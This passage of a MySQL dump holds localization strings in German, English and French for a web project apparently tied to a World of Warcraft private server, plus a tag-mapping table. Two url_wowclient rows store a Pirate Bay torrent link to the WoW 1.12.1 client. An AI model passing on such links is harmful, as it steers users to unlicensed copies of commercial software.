3, '2015-04-20 19:00:54', '2015-04-20 19:00:54'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_time_edit', 'deDE', 'Editiert', 2, 2, '2015-04-23 02:00:59', '2015-04-23 02:00:59'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_time_edit', 'enUS', 'Edit Time', 2, 2, '2015-04-18 13:38:14', '2015-04-18 13:38:14'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_time_edit', 'frFR', 'édité', 3, 3, '2015-04-20 19:01:35', '2015-04-20 19:01:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_trace', 'deDE', 'Spur', 2, 2, '2015-04-23 01:56:05', '2015-04-23 01:56:05'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_trace', 'enUS', 'Trace', 2, 2, '2015-04-18 13:51:11', '2015-04-18 13:51:11'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_url', 'deDE', 'URL', 2, 2, '2015-04-23 01:59:19', '2015-04-23 01:59:19'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_url', 'enUS', 'URL', 2, 2, '2015-04-18 14:44:00', '2015-04-18 14:44:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_user', 'deDE', 'Nutzer', 2, 2, '2015-04-18 14:44:09', '2015-04-18 14:44:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_user', 'enUS', 'User', 2, 2, '2015-04-18 14:44:09', '2015-04-18 14:44:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_username', 'deDE', 'Nutzername', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_username', 'enUS', 'Username', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_value', 'deDE', 'Wert', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_value', 'enUS', 'Value', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_version', 'deDE', 'Version', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_version', 'enUS', 'Version', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago', 'deDE', 'Vergangene Zeit', 2, 2, '2015-04-20 01:39:10', '2015-04-20 01:39:10'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago', 'enUS', 'Time Ago', 2, 2, '2015-04-18 14:42:32', '2015-04-18 14:42:32'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago', 'frFR', 'temps passé', 3, 3, '2015-04-20 14:39:52', '2015-04-20 14:39:52'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_day', 'deDE', 'Tage vergangen', 2, 3, '2015-04-20 14:43:03', '2015-04-20 14:43:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_day', 'enUS', 'day(s) ago', 2, 2, '2015-04-18 14:36:07', '2015-04-18 14:36:07'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_day', 'frFR', 'jour(s) sont passé', 3, 3, '2015-04-20 14:43:09', '2015-04-20 14:43:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_hour', 'deDE', 'Stunde(n) zuvor', 2, 3, '2015-04-20 14:42:41', '2015-04-20 14:42:41'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_hour', 'enUS', 'hour(s) ago', 2, 2, '2015-04-18 14:35:37', '2015-04-18 14:35:37'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_hour', 'frFR', 'heure(s) sont passé', 3, 3, '2015-04-20 14:42:48', '2015-04-20 14:42:48'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_minute', 'deDE', 'Minute(n) zuvor', 2, 3, '2015-04-20 14:44:58', '2015-04-20 14:44:58'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_minute', 'enUS', 'minute(s) ago', 2, 2, '2015-04-18 14:35:32', '2015-04-18 14:35:32'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_minute', 'frFR', 'minutes(s) sont passé', 3, 3, '2015-04-20 14:42:23', '2015-04-20 14:42:23'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_month', 'deDE', 'Monat(e) zuvor', 2, 3, '2015-04-20 14:43:58', '2015-04-20 14:43:58'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_month', 'enUS', 'month(s) ago', 2, 2, '2015-04-18 14:35:52', '2015-04-18 14:35:52'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_month', 'frFR', 'mois sont passé', 3, 3, '2015-04-20 14:44:04', '2015-04-20 14:44:04'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_second', 'deDE', 'Sekunde(n) zuvor', 2, 2, '2015-04-20 01:36:54', '2015-04-20 01:36:54'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_second', 'enUS', 'second(s) ago', 2, 2, '2015-04-18 14:35:25', '2015-04-18 14:35:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_second', 'frFR', 'seconde(s) sont passé', 3, 3, '2015-04-20 14:38:47', '2015-04-20 14:38:47'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_year', 'deDE', 'Jahr(e) vergangen', 2, 3, '2015-04-20 14:43:34', '2015-04-20 14:43:34'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_year', 'enUS', 'year(s) ago', 2, 2, '2015-04-18 14:35:46', '2015-04-18 14:35:46'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('time_ago_year', 'frFR', 'an(s) sont passé', 3, 3, '2015-04-20 14:43:40', '2015-04-20 14:43:40'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('url_wowclient', 'deDE', 'http://thepiratebay.se/torrent/7784594/World_of_Warcraft_1.12.1_Vanilla_-_Windows_ENGLISH', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('url_wowclient', 'enUS', 'http://thepiratebay.se/torrent/7784594/World_of_Warcraft_1.12.1_Vanilla_-_Windows_ENGLISH', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); /*!40000 ALTER TABLE `system_text` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_text_tag CREATE TABLE IF NOT EXISTS `system_text_tag` ( `id` char(35) NOT NULL, `tag` char(35) NOT NULL, PRIMARY KEY (`id`,`tag`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- Exportiere Daten aus Tabelle host_mojotrollz.system_text_tag: ~326 rows (ungefähr) /*!40000 ALTER TABLE `system_text_tag` DISABLE KEYS */; INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_add', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_add', 'sai_cron'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_add', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_add', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_add_right', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_add_right', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_admin_rights', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_admin_rights', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_admin_rights', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_all', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_all', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_all', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_all', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_all', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_analytics', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_analytics', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_analytics', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_assign', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_assign', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_back', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_back', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_back', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_cancel', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_cancel', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_change', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_change', 'sai_cron'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_close', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_close', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_close_all', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_close_all', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_deassign', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_deassign', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_delete', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_delete', 'sai_cron'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_delete', 'sai_files'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_delete', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_delete', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_edit', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_edit', 'sai_cron'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_edit', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_edit', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_email', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_email', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_email_wrong', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_error', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_error', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_example', 'example'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_free', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_free', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_generated', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_generated', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_git', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_git', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_ips', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_ips', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_join_date', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_join_date', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_last_active', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_last_active', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_locale', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_locale', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_locale', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_log', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_log', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_log', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_login', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_login', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_login', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_logout', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_logout', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_logout', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_mine', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_mine', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_month', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_month', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_name', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_name', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_new_right', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_new_right', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_no_tag', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_no_tag', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_open', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_open', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_others', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_others', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_page', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_page', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_page', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_page', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_page', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password_long', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password_long', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password_match', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password_match', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password_miss', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password_miss', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password_short', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_password_short', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_email', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_email', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_password', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_password', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_password', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_search', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_search', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_search', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_search', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_search', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_username', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_username', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_placeholder_username', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_priority', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_priority', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_progress', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_progress', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_project', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_project', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_refresh', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_refresh', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_refresh', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_register', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_register', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_rename', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_rename', 'sai_files'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_report', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_report', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_rows', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_rows', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_rows', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_rows', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_rows', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_save', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_save', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_search', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_search', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_search', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_search', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_search', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_send_email', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_send_email', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_show_all', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_show_all', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_state_login', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_state_login', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_status', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_status', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_text_login', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_text_login', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_text_login', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_text_logout', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_text_logout', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_text_password_miss', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_text_password_miss', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_text_register', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_text_register', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_today', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_today', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_todo', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_todo', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_upload', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_upload', 'sai_files'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_URL', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_URL', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_user', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_user', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_username', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_username', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_username', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_username_long', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_username_miss', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_username_short', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_users', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_users', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_week', 'basic'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('basic_week', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('character_name', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('class_druid', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('class_hunter', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('class_paladin', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('class_priest', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('class_rogue', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('class_shaman', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('class_warlock', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('class_warrior', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('client_version', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('database_version', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('default', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('friend_name', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('friend_title', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('mojotrollz_page_title', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('race_dwarf', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('race_gnome', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('race_human', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('race_nightelf', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('race_ork', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('race_tauren', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('race_troll', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('race_undead', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('realmlist', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_api_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_api_title', 'sai_api'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_cache_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_cache_title', 'sai_cache'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_config_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_config_title', 'sai_config'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_copyright', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_copyright', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_cron_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_cron_title', 'sai_cron'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_docu_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_docu_title', 'sai_docu'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_files_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_files_title', 'sai_files'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_git_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_git_title', 'sai_git'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_log_latest_entries', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_log_latest_entries', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_log_page_value', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_log_page_value', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_log_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_log_title', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_api', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_api', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_cache', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_cache', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_config', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_config', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_cron', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) 